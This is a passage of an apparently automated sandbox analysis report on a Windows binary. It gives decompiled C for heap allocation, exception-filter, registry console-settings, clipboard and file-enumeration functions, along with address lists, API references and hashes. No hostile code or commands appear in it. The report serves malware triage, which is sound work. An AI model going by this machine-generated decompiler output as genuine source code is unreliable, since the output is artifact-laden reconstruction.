				L72:
				return _v16;
			}
































































                          0x00bc18e7
                          0x00bc18ee
                          0x00bc18f5
                          0x00bc18fc
                          0x00bc1903
                          0x00bc190a
                          0x00bc1911
                          0x00bc1918
                          0x00bc191f
                          0x00bc1926
                          0x00bc192d
                          0x00bc1932
                          0x00bc1939
                          0x00bc1961
                          0x00bc199e
                          0x00bc19a7
                          0x00bc19c3
                          0x00bc19e6
                          0x00bc19ef
                          0x00bc19fe
                          0x00bc1a17
                          0x00bc1a1d
                          0x00bc1a20
                          0x00bc1a30
                          0x00bc1a3f
                          0x00bc1a52
                          0x00bc1a61
                          0x00bc1a74
                          0x00bc1a83
                          0x00bc1a96
                          0x00bc1aa6
                          0x00bc1ab5
                          0x00bc1ac4
                          0x00bc1ad7
                          0x00bc1aea
                          0x00bc1af9
                          0x00bc1b08
                          0x00bc1b18
                          0x00bc1b21
                          0x00bc1b27
                          0x00bc1b2a
                          0x00000000
                          0x00000000
                          0x00bc1b30
                          0x00bc1b38
                          0x00bc1b3a
                          0x00bc1b3d
                          0x00bc1b45
                          0x00bc1b4b
                          0x00bc1b51
                          0x00bc1b54
                          0x00bc1b59
                          0x00bc1b60
                          0x00bc1b63
                          0x00bc1b66
                          0x00000000
                          0x00000000
                          0x00bc1b6c
                          0x00bc1b7c
                          0x00bc1b7c
                          0x00bc1b84
                          0x00bc1b8a
                          0x00bc1b8f
                          0x00bc1b94
                          0x00bc1b9e
                          0x00bc1ba3
                          0x00bc1ba6
                          0x00bc1bae
                          0x00bc1bb3
                          0x00bc1bb8
                          0x00bc1bbb
                          0x00bc1bcd
                          0x00bc1bd4
                          0x00bc1bd7
                          0x00bc1bda
                          0x00000000
                          0x00000000
                          0x00bc1bf0
                          0x00bc1bf3
                          0x00bc1bf7
                          0x00bc1bfc
                          0x00bc1bff
                          0x00bc1c21
                          0x00bc1c24
                          0x00bc1c28
                          0x00bc1c2d
                          0x00bc1c30
                          0x00bc1c66
                          0x00bc1c69
                          0x00bc1c6d
                          0x00bc1c72
                          0x00bc1c75
                          0x00bc1d13
                          0x00bc1d16
                          0x00bc1d1a
                          0x00bc1d1f
                          0x00bc1d22
                          0x00bc1dc0
                          0x00bc1dc3
                          0x00bc1dc7
                          0x00bc1dcc
                          0x00bc1dcf
                          0x00bc1e47
                          0x00bc1e4a
                          0x00bc1e4e
                          0x00bc1e53
                          0x00bc1e56
                          0x00bc1ec0
                          0x00bc1e5c
                          0x00bc1e5f
                          0x00bc1e62
                          0x00bc1e65
                          0x00bc1e68
                          0x00bc1e89
                          0x00bc1e8c
                          0x00bc1e90
                          0x00bc1e9d
                          0x00bc1ea5
                          0x00bc1ea9
                          0x00000000
                          0x00bc1eaf
                          0x00bc1eaf
                          0x00bc1eaf
                          0x00bc1e6e
                          0x00bc1e6e
                          0x00bc1e6e
                          0x00bc1e68
                          0x00bc1dd5
                          0x00bc1dd8
                          0x00bc1ddb
                          0x00bc1dde
                          0x00bc1de1
                          0x00bc1e02
                          0x00bc1e05
                          0x00bc1e09
                          0x00bc1e16
                          0x00bc1e1c
                          0x00bc1e20
                          0x00000000
                          0x00bc1e26
                          0x00bc1e26
                          0x00bc1e26
                          0x00bc1de7
                          0x00bc1de7
                          0x00bc1de7
                          0x00bc1de1
                          0x00bc1d28
                          0x00bc1d2b
                          0x00bc1d2e
                          0x00bc1d31
                          0x00bc1d34
                          0x00bc1d55
                          0x00bc1d58
                          0x00bc1d5c
                          0x00bc1d69
                          0x00bc1d6c
                          0x00bc1d70
                          0x00bc1d83
                          0x00bc1d83
                          0x00bc1d8a
                          0x00000000
                          0x00bc1d90
                          0x00bc1d96
                          0x00bc1d99
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bc1d99
                          0x00bc1d76
                          0x00bc1d76
                          0x00bc1d7d
                          0x00bc1d9f
                          0x00bc1d9f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bc1d7d
                          0x00bc1d3a
                          0x00bc1d3a
                          0x00bc1d3a
                          0x00bc1d34
                          0x00bc1c7b
                          0x00bc1c7e
                          0x00bc1c81
                          0x00bc1c84
                          0x00bc1c87
                          0x00bc1ca8
                          0x00bc1cab
                          0x00bc1caf
                          0x00bc1cbc
                          0x00bc1cbf
                          0x00bc1cc3
                          0x00bc1cd6
                          0x00bc1cd6
                          0x00bc1cdd
                          0x00000000
                          0x00bc1ce3
                          0x00bc1ce9
                          0x00bc1cec
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bc1cec
                          0x00bc1cc9
                          0x00bc1cc9
                          0x00bc1cd0
                          0x00bc1cf2
                          0x00bc1cf2
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bc1cd0
                          0x00bc1c8d
                          0x00bc1c8d
                          0x00bc1c8d
                          0x00bc1c87
                          0x00bc1c36
                          0x00bc1c36
                          0x00bc1c40
                          0x00bc1c4a
                          0x00000000
                          0x00bc1c4a
                          0x00bc1c05
                          0x00bc1c05
                          0x00bc1ecc
                          0x00bc1ed2
                          0x00000000
                          0x00bc1ed2
                          0x00000000
                          0x00bc1bff
                          0x00bc1eda
                          0x00bc1ee1
                          0x00bc1ef3
                          0x00bc1ef7
                          0x00bc1efd
                          0x00bc1efd
                          0x00bc1f04
                          0x00bc1f08
                          0x00bc1f0e
                          0x00bc1f0e
                          0x00bc1f21
                          0x00bc1f24
                          0x00bc1f2c
                          0x00bc1f30
                          0x00bc1f34
                          0x00bc1f39
                          0x00bc1f3c
                          0x00bc1f41
                          0x00bc1f44
                          0x00bc1f56
                          0x00bc1f5a
                          0x00bc2002
                          0x00bc2005
                          0x00bc200a
                          0x00bc200d
                          0x00bc2010
                          0x00bc2028
                          0x00bc202b
                          0x00bc2031
                          0x00bc2037
                          0x00bc203a
                          0x00bc204b
                          0x00bc204e
                          0x00bc2052
                          0x00bc2056
                          0x00bc205b
                          0x00bc2064
                          0x00bc2067
                          0x00bc2081
                          0x00bc206d
                          0x00bc2071
                          0x00bc2071
                          0x00bc2092
                          0x00bc2098
                          0x00bc209b
                          0x00bc209f
                          0x00bc20a5
                          0x00000000
                          0x00bc2016
                          0x00bc2016
                          0x00bc2016
                          0x00bc1f60
                          0x00bc1f60
                          0x00bc1f67
                          0x00bc1f6d
                          0x00bc1f70
                          0x00bc1f75
                          0x00bc1f7c
                          0x00bc1f82
                          0x00bc1f85
                          0x00bc1f8a
                          0x00bc1f91
                          0x00bc1fa4
                          0x00bc1faa
                          0x00bc1fad
                          0x00bc1fb2
                          0x00bc1fb5
                          0x00bc1fbc
                          0x00bc1fe8
                          0x00000000
                          0x00bc1fc2
                          0x00bc1fc8
                          0x00bc1fcb
                          0x00bc1fd0
                          0x00bc1fd3
                          0x00bc1fd6
                          0x00000000
                          0x00bc1fdc
                          0x00bc1fdc
                          0x00bc1fdc
                          0x00bc1fd6
                          0x00bc1f97
                          0x00bc1f97
                          0x00bc1f9e
                          0x00bc1fed
                          0x00bc1ff7
                          0x00bc20a8
                          0x00bc20b1
                          0x00bc20b4
                          0x00bc20c0
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bc1f9e
                          0x00bc1f91
                          0x00bc1f4a
                          0x00bc1f4a
                          0x00bc1f4a
                          0x00bc1ee7
                          0x00bc1ee7
                          0x00bc1ee7
                          0x00bc1bc1
                          0x00bc1bc1
                          0x00bc1bc1
                          0x00bc193f
                          0x00bc193f
                          0x00bc193f
                          0x00bc20c3
                          0x00bc20cf

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: File$AllocCreateReadSizeVirtual
                          • String ID: --headless$--height$--server$--signal$--unix$--width$@$P$T
                          • API String ID: 4119528295-967118136
                          • Opcode ID: 8b1e33ca07b64f985b2a20d5be1c38920199db37f37237dfe24c11e2e91dc824
                          • Instruction ID: dca981e0c36c3079ce203420baf95ebd3b28f813944dc18daac4d4b09ec34d07
                          • Opcode Fuzzy Hash: 8b1e33ca07b64f985b2a20d5be1c38920199db37f37237dfe24c11e2e91dc824
                          • Instruction Fuzzy Hash: 3D32E4B4909258CFDB10DFA8D484BADBBF0FF49304F11489EE885AB392D7759985CB12
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCD780 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 146 bcd780-bcd78b SetUnhandledExceptionFilter
                          C-Code - Quality: 100%
                          			E00BCD780() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00BCD8A7); // executed
				return _t1;
			}




                          0x00bcd785
                          0x00bcd78b

                          APIs
                          • SetUnhandledExceptionFilter.KERNELBASE(Function_0000D8A7,00BCD203), ref: 00BCD785
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 49388d018957a17d4622a9aaf08da4ed0401e0ac233e4d150a4ec63d1dabcece
                          • Instruction ID: 8eeee635ff63ad97501ae5862b0bf38c5d57630a5e9430bc2bf7666a1cadf6c7
                          • Opcode Fuzzy Hash: 49388d018957a17d4622a9aaf08da4ed0401e0ac233e4d150a4ec63d1dabcece
                          • Instruction Fuzzy Hash:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD48D1 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 115 bd48d1-bd48dc 116 bd48de-bd48e8 115->116 117 bd48ea-bd48f0 115->117 116->117 118 bd491e-bd4929 call bd4844 116->118 119 bd4909-bd491a RtlAllocateHeap 117->119 120 bd48f2-bd48f3 117->120 125 bd492b-bd492d 118->125 121 bd491c 119->121 122 bd48f5-bd48fc call bd0f5d 119->122 120->119 121->125 122->118 128 bd48fe-bd4907 call bd3a5f 122->128 128->118 128->119
                          C-Code - Quality: 100%
                          			E00BD48D1(signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xbe62dc, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00BD0F5D();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00BD4844())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00BD3A5F(__eflags, _t19);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}








                          0x00bd48d7
                          0x00bd48dc
                          0x00bd48ea
                          0x00bd48ea
                          0x00bd48f0
                          0x00bd48f2
                          0x00bd48f2
                          0x00bd4909
                          0x00bd4912
                          0x00bd491a
                          0x00000000
                          0x00000000
                          0x00bd48fa
                          0x00bd48fc
                          0x00bd491e
                          0x00bd4923
                          0x00bd4929
                          0x00000000
                          0x00bd4929
                          0x00bd48ff
                          0x00bd4905
                          0x00bd4907
                          0x00000000
                          0x00000000
                          0x00bd4907
                          0x00000000
                          0x00bd4909
                          0x00bd48e2
                          0x00bd48e8
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BD27EA,00000001,00000364,00000000,00000007,000000FF,?,?,00BD4849,00BD3758), ref: 00BD4912
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 247218f5f1d85273c0f0eebe4f9914855af8ac853fa7bab8e5630bf8817d00e6
                          • Instruction ID: a346c2f08f95424e587cc797e6645e70323acf65d2de5fca6711710fc6a254f8
                          • Opcode Fuzzy Hash: 247218f5f1d85273c0f0eebe4f9914855af8ac853fa7bab8e5630bf8817d00e6
                          • Instruction Fuzzy Hash: 8BF0B431605278AF9F216E239C55B5BFBC9EB417A0B1484A3A808AB391FB35DD0097A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD492E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 131 bd492e-bd493a 132 bd496c-bd4977 call bd4844 131->132 133 bd493c-bd493e 131->133 141 bd4979-bd497b 132->141 134 bd4957-bd4968 RtlAllocateHeap 133->134 135 bd4940-bd4941 133->135 137 bd496a 134->137 138 bd4943-bd494a call bd0f5d 134->138 135->134 137->141 138->132 143 bd494c-bd4955 call bd3a5f 138->143 143->132 143->134
                          C-Code - Quality: 100%
                          			E00BD492E(long _a4) {
				void* _t4;
				void* _t6;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00BD4844())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xbe62dc, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00BD0F5D();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00BD3A5F(__eflags, _t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}






                          0x00bd4934
                          0x00bd493a
                          0x00bd496c
                          0x00bd4971
                          0x00bd4977
                          0x00000000
                          0x00bd4977
                          0x00bd493e
                          0x00bd4940
                          0x00bd4940
                          0x00bd4957
                          0x00bd4960
                          0x00bd4968
                          0x00000000
                          0x00000000
                          0x00bd4948
                          0x00bd494a
                          0x00000000
                          0x00000000
                          0x00bd494d
                          0x00bd4953
                          0x00bd4955
                          0x00000000
                          0x00000000
                          0x00bd4955
                          0x00000000

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,00BD5E98,?,?,?,00BC5750), ref: 00BD4960
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: eacc78c3ad230bfb0650e03c00011dacf16ffa6e9f8a15fa40e52f2c6588ef23
                          • Instruction ID: 345605e84aea238d273d3c1b3da831b251f571fbb780d1049c9bb4b51bc81107
                          • Opcode Fuzzy Hash: eacc78c3ad230bfb0650e03c00011dacf16ffa6e9f8a15fa40e52f2c6588ef23
                          • Instruction Fuzzy Hash: EAE0A0312012625FDA2137A69C1475BEEC8DB417A0F2400E3BC09A7392FB78CD0085A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 00BCC520 Relevance: 74.0, APIs: 24, Strings: 18, Instructions: 467registrystringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 279 bcc520-bcc538 280 bcc53e-bcc556 call bc33d0 279->280 281 bcc559 279->281 280->281 283 bcc563-bcc587 281->283 286 bcc58d-bcc591 283->286 287 bcc641-bcc645 283->287 288 bcc5b6-bcc625 wsprintfW RegSetValueExW 286->288 289 bcc597-bcc5b0 286->289 290 bcc65d-bcc6a3 RegSetValueExW 287->290 291 bcc64b-bcc657 287->291 292 bcc628-bcc63c 288->292 289->288 289->292 293 bcc6a6-bcc6aa 290->293 291->290 291->293 292->283 295 bcc6b0-bcc6bc 293->295 296 bcc6c2-bcc708 RegSetValueExW 293->296 295->296 297 bcc70b-bcc70f 295->297 296->297 298 bcc715-bcc721 297->298 299 bcc727-bcc770 RegSetValueExW 297->299 298->299 300 bcc773-bcc777 298->300 299->300 301 bcc77d-bcc7a4 lstrcmpW 300->301 302 bcc7aa-bcc7fd lstrlenW RegSetValueExW 300->302 301->302 303 bcc800-bcc804 301->303 302->303 304 bcc81c-bcc865 RegSetValueExW 303->304 305 bcc80a-bcc816 303->305 306 bcc868-bcc86c 304->306 305->304 305->306 307 bcc896-bcc94c GetDpiForSystem MulDiv GetDpiForSystem MulDiv RegSetValueExW 306->307 308 bcc872-bcc87e 306->308 310 bcc94f-bcc953 307->310 308->307 309 bcc884-bcc890 308->309 309->307 309->310 311 bcc959-bcc965 310->311 312 bcc96b-bcc9b4 RegSetValueExW 310->312 311->312 313 bcc9b7-bcc9bb 311->313 312->313 314 bcc9d0-bcca16 RegSetValueExW 313->314 315 bcc9c1-bcc9ca 313->315 316 bcca19-bcca1d 314->316 315->314 315->316 317 bcca32-bcca78 RegSetValueExW 316->317 318 bcca23-bcca2c 316->318 319 bcca7b-bcca7f 317->319 318->317 318->319 320 bcca94-bccada RegSetValueExW 319->320 321 bcca85-bcca8e 319->321 322 bccadd-bccae1 320->322 321->320 321->322 323 bccaf6-bccb3c RegSetValueExW 322->323 324 bccae7-bccaf0 322->324 325 bccb3f-bccb43 323->325 324->323 324->325 326 bccb58-bccb9e RegSetValueExW 325->326 327 bccb49-bccb52 325->327 328 bccba1-bccba5 326->328 327->326 327->328 329 bccbba-bccc00 RegSetValueExW 328->329 330 bccbab-bccbb4 328->330 331 bccc03-bccc07 329->331 330->329 330->331 332 bccc0d-bccc16 331->332 333 bccc2b-bccc8d RegSetValueExW 331->333 332->333 334 bccc1c-bccc25 332->334 335 bccc90-bccc94 333->335 334->333 334->335 336 bcccac-bcccf2 RegSetValueExW 335->336 337 bccc9a-bccca6 335->337 338 bcccf5-bcccf9 336->338 337->336 337->338 339 bccd1d-bccd7f RegSetValueExW 338->339 340 bcccff-bccd08 338->340 342 bccd82-bccd8b 339->342 340->339 341 bccd0e-bccd17 340->341 341->339 341->342
                          APIs
                          • wsprintfW.USER32 ref: 00BCC5D3
                          • RegSetValueExW.ADVAPI32 ref: 00BCC61F
                          • RegSetValueExW.ADVAPI32 ref: 00BCC69D
                          • RegSetValueExW.ADVAPI32 ref: 00BCC702
                            • Part of subcall function 00BC33D0: GetDpiForSystem.USER32 ref: 00BC343C
                            • Part of subcall function 00BC33D0: MulDiv.KERNEL32 ref: 00BC3455
                            • Part of subcall function 00BC33D0: GetDpiForSystem.USER32 ref: 00BC3466
                            • Part of subcall function 00BC33D0: MulDiv.KERNEL32 ref: 00BC347F
                          • RegSetValueExW.ADVAPI32 ref: 00BCC76A
                          • lstrcmpW.KERNEL32 ref: 00BCC798
                          • lstrlenW.KERNEL32 ref: 00BCC7B5
                          • RegSetValueExW.ADVAPI32 ref: 00BCC7F7
                          • RegSetValueExW.ADVAPI32 ref: 00BCC85F
                          • GetDpiForSystem.USER32 ref: 00BCC896
                          • MulDiv.KERNEL32 ref: 00BCC8B1
                          • GetDpiForSystem.USER32 ref: 00BCC8C0
                          • MulDiv.KERNEL32 ref: 00BCC8DB
                          • RegSetValueExW.ADVAPI32 ref: 00BCC946
                          • RegSetValueExW.ADVAPI32 ref: 00BCC9AE
                          • RegSetValueExW.ADVAPI32 ref: 00BCCA10
                          • RegSetValueExW.ADVAPI32 ref: 00BCCA72
                          • RegSetValueExW.ADVAPI32 ref: 00BCCAD4
                          • RegSetValueExW.ADVAPI32 ref: 00BCCB36
                          • RegSetValueExW.ADVAPI32 ref: 00BCCB98
                          • RegSetValueExW.ADVAPI32 ref: 00BCCBFA
                          • RegSetValueExW.ADVAPI32 ref: 00BCCC87
                          • RegSetValueExW.ADVAPI32 ref: 00BCCCEC
                          • RegSetValueExW.ADVAPI32 ref: 00BCCD79
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: Value$System$lstrcmplstrlenwsprintf
                          • String ID: ColorTable%02d$CursorSize$CursorVisible$EditionMode$FaceName$FontPitchFamily$FontSize$FontWeight$HistoryBufferSize$HistoryNoDup$InsertMode$MenuMask$PopupColors$QuickEdit$ScreenBufferSize$ScreenColors$WindowSize$`
                          • API String ID: 4202061470-2238697219
                          • Opcode ID: 5ef803162438cc3a9b6ee79701e707150f1b15f8eb30428ebe135a66ed067f05
                          • Instruction ID: 8f3a93b2ce213617c036cd1155700675b23c3877cb9e2ca08b68e01d1ac16ef3
                          • Opcode Fuzzy Hash: 5ef803162438cc3a9b6ee79701e707150f1b15f8eb30428ebe135a66ed067f05
                          • Instruction Fuzzy Hash: CB32C2B0904249DFDB10DF58C484BAEBBF0FF48314F1189AEE9599B250D7749A88CF92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCAD00 Relevance: 12.1, APIs: 8, Instructions: 98clipboardkeyboardCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: ClipboardGlobal$CloseDataLockOpenScanSizeUnlockVirtual
                          • String ID:
                          • API String ID: 1615112705-0
                          • Opcode ID: 2258ffec74b2c17f5e5bb8c61827ca876072dd5b24010795653a07d73c0b39e2
                          • Instruction ID: a0fa44a27fb4211acfc8227779e78f9092a5bff97f524c5863bf2c9bfa69732e
                          • Opcode Fuzzy Hash: 2258ffec74b2c17f5e5bb8c61827ca876072dd5b24010795653a07d73c0b39e2
                          • Instruction Fuzzy Hash: 9B41C4B5904208EFDB00EFA8D4897ADBBF0FF04305F10896DE885AB250EB759994CB56
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD53A7 Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 80%
                          			E00BD53A7(WCHAR* _a4, signed int _a8, char* _a12) {
				signed int _v8;
				short _v552;
				short _v554;
				struct _WIN32_FIND_DATAW _v600;
				char _v601;
				signed int _v608;
				signed int _v612;
				intOrPtr _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed char _t32;
				void* _t41;
				intOrPtr _t43;
				intOrPtr _t45;
				int _t48;
				signed int* _t59;
				char* _t60;
				WCHAR* _t68;
				signed int _t70;
				void* _t71;

				_t30 =  *0xbe4050; // 0xe9e688dc
				_v8 = _t30 ^ _t70;
				_t65 = _a8;
				_t60 = _a12;
				_t68 = _a4;
				_v608 = _t60;
				if(_t65 != _t68) {
					while(E00BD551D( *_t65 & 0x0000ffff) == 0) {
						_t65 = _t65 - 2;
						if(_t65 != _t68) {
							continue;
						}
						break;
					}
					_t60 = _v608;
				}
				_t69 =  *_t65 & 0x0000ffff;
				if(( *_t65 & 0x0000ffff) != 0x3a) {
					L8:
					_t60 =  &_v601;
					_t32 = E00BD551D(_t69);
					_t65 = (_t65 - _t68 >> 1) + 1;
					asm("sbb eax, eax");
					_t59 = 0;
					_v612 =  ~(_t32 & 0x000000ff) & _t65;
					_t69 = FindFirstFileExW(_t68, 0,  &_v600, 0, 0, 0);
					if(_t69 != 0xffffffff) {
						_t59 = _v608;
						_v608 = _t59[1] -  *_t59 >> 2;
						_t41 = 0x2e;
						do {
							if(_v600.cFileName != _t41 || _v554 != 0 && (_v554 != _t41 || _v552 != 0)) {
								_push(_t59);
								_t43 = E00BD52F3(_t60,  &(_v600.cFileName), _t68, _v612);
								_t71 = _t71 + 0x10;
								_v616 = _t43;
								if(_t43 != 0) {
									FindClose(_t69);
									_t45 = _v616;
								} else {
									goto L16;
								}
							} else {
								goto L16;
							}
							goto L21;
							L16:
							_t48 = FindNextFileW(_t69,  &_v600);
							_t41 = 0x2e;
						} while (_t48 != 0);
						_t65 =  *_t59;
						_t63 = _v608;
						_t51 = _t59[1] -  *_t59 >> 2;
						if(_v608 != _t59[1] -  *_t59 >> 2) {
							E00BD8110(_t65, _t65 + _t63 * 4, _t51 - _t63, 4, E00BD5541);
						}
						FindClose(_t69);
						_t45 = 0;
					} else {
						_push(_v608);
						goto L7;
					}
				} else {
					_t8 =  &(_t68[1]); // 0x2
					if(_t65 == _t8) {
						goto L8;
					} else {
						_push(_t60);
						_t59 = 0;
						L7:
						_t45 = E00BD52F3(_t60, _t68, _t59, _t59);
					}
				}
				L21:
				return E00BCDB85(_t45, _t59, _v8 ^ _t70, _t65, _t68, _t69);
			}

























                          0x00bd53b2
                          0x00bd53b9
                          0x00bd53bc
                          0x00bd53bf
                          0x00bd53c5
                          0x00bd53c8
                          0x00bd53d0
                          0x00bd53d2
                          0x00bd53e5
                          0x00bd53ea
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd53ea
                          0x00bd53ec
                          0x00bd53ec
                          0x00bd53f2
                          0x00bd53f8
                          0x00bd5414
                          0x00bd5415
                          0x00bd541b
                          0x00bd5427
                          0x00bd542a
                          0x00bd542c
                          0x00bd5433
                          0x00bd5448
                          0x00bd544d
                          0x00bd5457
                          0x00bd5467
                          0x00bd546d
                          0x00bd546e
                          0x00bd5475
                          0x00bd5494
                          0x00bd54a3
                          0x00bd54a8
                          0x00bd54ab
                          0x00bd54b3
                          0x00bd5502
                          0x00bd5508
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd54b5
                          0x00bd54bd
                          0x00bd54c7
                          0x00bd54c7
                          0x00bd54cd
                          0x00bd54d1
                          0x00bd54d7
                          0x00bd54dc
                          0x00bd54f7
                          0x00bd54fc
                          0x00bd54df
                          0x00bd54e5
                          0x00bd544f
